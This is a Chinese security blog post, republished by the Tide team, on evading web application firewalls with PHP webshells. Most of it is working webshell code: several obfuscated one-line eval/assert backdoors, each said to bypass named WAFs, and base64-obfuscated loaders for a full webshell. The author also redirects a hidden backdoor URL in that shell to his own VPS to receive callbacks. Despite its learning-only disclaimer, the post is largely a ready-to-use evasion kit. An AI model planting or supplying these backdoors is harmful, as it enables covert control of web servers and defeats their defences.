声 明
本文由Tide安全团队成员“CSeroad”首发于FreeBuf TideSec专栏:
https://zhuanlan.freebuf.com/column/index/?name=TideSec
文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
一句话木马
在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护,就寻找一个免杀的大马挂马。
最常见的php一句话木马
<?php @eval($_POST['x']);?>
这个一句话木马由两部分组成,eval用来执行接收的代码。$_POST['x']来接收数值。
本着这个原则,尝试改写一句话木马绕过WAF。
搜集了几个常用的php函数
执行代码的eval、assert、preg_replace
接收数据的$_POST、$_GET、$_REQUEST
php一句话免杀
str_rot13函数
<?php
$c=str_rot13('nffreg');
$c($_REQUEST['x']);
?>
str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。
测试发现无法绕过安全狗。修改一下。
<?php
function xiaoma($a){
$c=str_rot13('nffreg');
$c($a);
}
xiaoma($_REQUEST['x']);
?>
即可绕过安全狗。
<?php
class One{
function xiaoma($x){
$c=str_rot13('n!ff!re!nffreg');
$str=explode('!',$c)[3];
$str($x);
}
}
$test=new One();
$test->xiaoma($_REQUEST['x']);
?>
再次修改,加了explode函数分割字符串,class封装类。可绕过D盾。
array_map函数
array_map() 函数将函数作用到数组中的每个值上,并返回一个新的数组。
<?php
$a1=array("1234","123456");
$a2=array(@$_REQUEST['x'],"1234");
$a=array_map(null,$a1,$a2)[0][1];
assert($a);
?>
即可绕过安全狗。
array_key函数
array_key() 函数也是返回包含数组的一个新数组。
<?php
$a=array($_REQUEST['x']=>"3");
$b=array_keys($a)[0];
eval($b);
?>
索引数组变化为关联数组。
即可绕过安全狗、D盾。
preg_replace函数
用来正则匹配的一个函数。
<?php
function func(){
return $_REQUEST['x'];
}
preg_replace("/test/e",func(),"i am test");
?>
/e用来当做php代码解析。5.6版本以下实用。
测试可绕过安全狗和D盾。
preg_filter函数
根据preg_replace修改为preg_filter函数,也是用来执行正则的匹配替换。
<?php
$a=preg_filter('/s+/','','as s er t');
$a($_REQUEST['x']);
?>
也可以绕过D盾、安全狗。
其他
<?php
function test($a){
$arr = array('a','s','s','e','r','t');
$func = '';
for($i=0;$i<count($arr);$i++) {
$func.=$func.$arr[$i];
}
$func=substr($func,-6);
$func($a);
}
test($_REQUEST['x']);
?>
也可以绕过D盾、安全狗。
php免杀大马
正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。
将大马eval函数变为exit或者echo。burp抓取源代码。
将源代码拷贝下来,审计发现给源码存在一处后门。
base64解码一下
哦!!!真是可以。
将该base64地址修改为自己的vps地址。嘻嘻。
那现在只要eval函数可以执行这传base64的字符串就可以啦。
WAF对base64_encode、base64_decode查杀非常严格。
不断搜索、修改、编写,最终成功。
<?php
header("Content-type: text/html; charset=utf-8");
class one{
public function dama(){
$l='base';
$o='64_de';
$v='co';
$e='de';
$love=$l.$o.$v.$e;
$c="love";
$shellname='网站安全检测';
$password='xxx';
$myurl='http://www.xxx.com';
$a=$$c('code');//php源码
@eval($a);
}
}
$person = new one;
$person->dama();
?>
直接将php大马源码放在code处。即可。
也可以改造php免杀一句话木马。
比如这款
<?php
header("Content-type: text/html; charset=utf-8");
function test($code){
$password='xxx';
$a=preg_filter('/s+/','','base 64 _ deco de');
$c=$a($code);
@eval($c);
}
$code=''; //code存放php大马
test($code);
?>
访问一下。
查看vps是否接收到。
参考资料:
PHP一句话木马之小马
PHP免杀大马的奇淫技巧
E
N
D
guān
关
zhù
注
wǒ
我
men
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或长按二维码关注公众号:
原文始发于微信公众号(白帽子):【实战技巧】Webshell免杀小技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论